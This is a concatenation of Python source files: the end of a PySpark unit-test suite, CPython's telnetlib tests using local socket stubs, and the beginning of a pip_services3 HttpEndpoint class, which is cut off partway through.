(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = zip(x, y)
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send("\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(PySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
self.sc.parallelize(range(1)).foreach(sleep)
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
data = open(path).read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(range(100), 1)
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name + ".zip")
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out)
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
t = threading.Thread(target=rdd.collect)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = map(gammaln, x)
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
if __name__ == "__main__":
if not _have_scipy:
print "NOTE: Skipping SciPy tests as it does not seem to be installed"
if not _have_numpy:
print "NOTE: Skipping NumPy tests as it does not seem to be installed"
unittest.main()
if not _have_scipy:
print "NOTE: SciPy tests were skipped as it does not seem to be installed"
if not _have_numpy:
print "NOTE: NumPy tests were skipped as it does not seem to be installed"
|
test_telnetlib.py
|
import socket
import selectors
import telnetlib
import threading
import contextlib
from test import support
from test.support import socket_helper
import unittest
support.requires_working_socket(module=True)
HOST = socket_helper.HOST
def server(evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except TimeoutError:
pass
finally:
serv.close()
class GeneralTests(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = socket_helper.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.daemon = True
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testContextManager(self):
with telnetlib.Telnet(HOST, self.port) as tn:
self.assertIsNotNone(tn.get_socket())
self.assertIsNone(tn.get_socket())
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
# None, having other default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testGetters(self):
# Test telnet getter methods
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
t_sock = telnet.sock
self.assertEqual(telnet.get_socket(), t_sock)
self.assertEqual(telnet.fileno(), t_sock.fileno())
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=()):
self.reads = list(reads) # Intentionally make a copy.
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
class MockSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
@property
def resolution(self):
return 1e-3
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout=None):
block = False
for fileobj in self.keys:
if isinstance(fileobj, TelnetAlike):
block = fileobj.sock.block
break
if block:
return []
else:
return [(key, key.events) for key in self.keys.values()]
def get_map(self):
return self.keys
@contextlib.contextmanager
def test_socket(reads):
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=(), cls=TelnetAlike):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
return telnet
class ExpectAndReadTestCase(unittest.TestCase):
def setUp(self):
self.old_selector = telnetlib._TelnetSelector
telnetlib._TelnetSelector = MockSelector
def tearDown(self):
telnetlib._TelnetSelector = self.old_selector
class ReadTests(ExpectAndReadTestCase):
def test_read_until(self):
"""
read_until(expected, timeout=None)
test the blocking version of read_util
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
# read_eager and read_very_eager make the same guarantees
# (they behave differently but we only test the guarantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
def read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(unittest.TestCase):
'''The only thing that write does is replace each tl.IAC for
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(unittest.TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
def test_expect(self):
"""
expect(expected, [timeout])
Read until the expected string has been seen, or a timeout is
hit (default is no timeout); may block.
"""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want)
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
if __name__ == '__main__':
unittest.main()
|
HttpEndpoint.py
|
# -*- coding: utf-8 -*-
"""
pip_services3_rpc.services.HttpEndpoint
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Http endpoint implementation
:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
import json
import re
import time
from threading import Thread
from typing import List, Optional, Callable
import bottle
from beaker.middleware import SessionMiddleware
from bottle import request, response
from pip_services3_commons.config import IConfigurable, ConfigParams
from pip_services3_commons.errors import ConnectionException, ConfigException
from pip_services3_commons.refer import IReferenceable, IReferences
from pip_services3_commons.run import IOpenable
from pip_services3_commons.validate import Schema
from pip_services3_components.count import CompositeCounters
from pip_services3_components.log import CompositeLogger
from . import IRegisterable
from .HttpResponseSender import HttpResponseSender
from .SSLCherryPyServer import SSLCherryPyServer
from ..connect.HttpConnectionResolver import HttpConnectionResolver
class HttpEndpoint(IOpenable, IConfigurable, IReferenceable):
"""
Used for creating HTTP endpoints. An endpoint is a URL, at which a given service can be accessed by a client.
### Configuration parameters ###
Parameters to pass to the :func:`configure` method for component configuration:
- cors_headers - a comma-separated list of allowed CORS headers
- cors_origins - a comma-separated list of allowed CORS origins
- connection(s) - the connection resolver's connections;
- "connection.discovery_key" - the key to use for connection resolving in a discovery service;
- "connection.protocol" - the connection's protocol;
- "connection.host" - the target host;
- "connection.port" - the target port;
- "connection.uri" - the target URI.
- credential - the HTTPS credentials:
- "credential.ssl_key_file" - the SSL private key in PEM
- "credential.ssl_crt_file" - the SSL certificate in PEM
- "credential.ssl_ca_file" - the certificate authorities (root cerfiticates) in PEM
### References ###
A logger, counters, and a connection resolver can be referenced by passing the following references to the object's :func:`set_references` method:
- `*:logger:*:*:1.0` (optional) :class:`ILogger <pip_services3_components.log.ILogger.ILogger>` components to pass log messages
- `*:counters:*:*:1.0` (optional) :class:`ICounters <pip_services3_components.count.ICounters.ICounters>` components to pass collected measurements
- `*:discovery:*:*:1.0` (optional) :class:`IDiscovery <pip_services3_components.connect.IDiscovery.IDiscovery>` services to resolve connection
Example:
.. code-block:: python
def my_method(_config, _references):
endpoint = HttpEndpoint()
if (_config)
endpoint.configure(_config)
if (_references)
endpoint.setReferences(_references)
# ...
endpoint.open(correlationId)
# ...
"""
_default_config = ConfigParams.from_tuples("connection.protocol", "http",
"connection.host", "0.0.0.0",
"connection.port", 3000,
"credential.ssl_key_file", None,
"credential.ssl_crt_file", None,
"credential.ssl_ca_file", None,
"options.maintenance_enabled", False,
"options.request_max_size", 1024 * 1024,
"options.file_max_size", 200 * 1024 * 1024,
"connection.connect_timeout", 60000,
"connection.debug", True)
_debug = False
def __init__(self):
"""
Creates HttpEndpoint
"""
self.__service = None
self.__server = None
self.__maintenance_enabled: bool = False
self.__file_max_size = 200 * 1024 * 1024
self.__protocol_upgrade_enabled: bool = False
self.__uri: str = None
self.__connection_resolver: HttpConnectionResolver = HttpConnectionResolver()
self.__logger: CompositeLogger = CompositeLogger()
self.__counters: CompositeCounters = CompositeCounters()
self.__registrations: List[IRegisterable] = []
self.__allowed_headers: List[str] = ["correlation_id"]
self.__allowed_origins: List[str] = []
def configure(self, config: ConfigParams):
"""
Configures this HttpEndpoint using the given configuration parameters.
- connection(s) - the connection resolver's connections;
- "connection.discovery_key" - the key to use for connection resolving in a discovery service;
- "connection.protocol" - the connection's protocol;
- "connection.host" - the target host;
- "connection.port" - the target port;
- "connection.uri" - the target URI.
:param config: configuration parameters, containing a "connection(s)" section.
"""
config = config.set_defaults(self._default_config)
self.__connection_resolver.configure(config)
bottle.BaseRequest.MEMFILE_MAX = config.get_as_long('options.request_max_size')
self.__file_max_size = config.get_as_long_with_default('options.file_max_size', self.__file_max_size)
self.__maintenance_enabled = config.get_as_boolean_with_default('options.maintenance_enabled',
self.__maintenance_enabled)
self.__protocol_upgrade_enabled = config.get_as_boolean_with_default('options.protocol_upgrade_enabled',
self.__protocol_upgrade_enabled)
self._debug = config.get_as_boolean_with_default('options.debug', self._debug)
headers = config.get_as_string_with_default("cors_headers", "").split(",")
for header in headers:
if header != '':
self.__allowed_headers = list(filter(lambda h: h != header, self.__allowed_headers))
self.__allowed_headers.append(header)
origins = config.get_as_string_with_default("cors_origins", "").split(',')
for origin in origins:
origin = origin.strip()
if origin != '':
self.__allowed_origins = list(filter(lambda h: h != origin, self.__allowed_origins))
self.__allowed_origins.append(origin)
def set_references(self, references: IReferences):
"""
Sets references to this endpoint's logger, counters, and connection resolver.
- *:logger:*:*:1.0 (optional) :class:`ILogger <pip_services3_components.log.ILogger.ILogger>` components to pass log messages
- *:counters:*:*:1.0 (optional) :class:`ICounters <pip_services3_components.count.ICounters.ICounters>` components to pass collected measurements
- *:discovery:*:*:1.0 (optional) :class:`IDiscovery <pip_services3_components.connect.IDiscovery.IDiscovery>` services to resolve connection
:param references: an IReferences object, containing references to a logger, counters, and a connection resolver.
"""
self.__logger.set_references(references)
self.__counters.set_references(references)
self.__connection_resolver.set_references(references)
def is_open(self) -> bool:
"""
Checks if the component is opened.
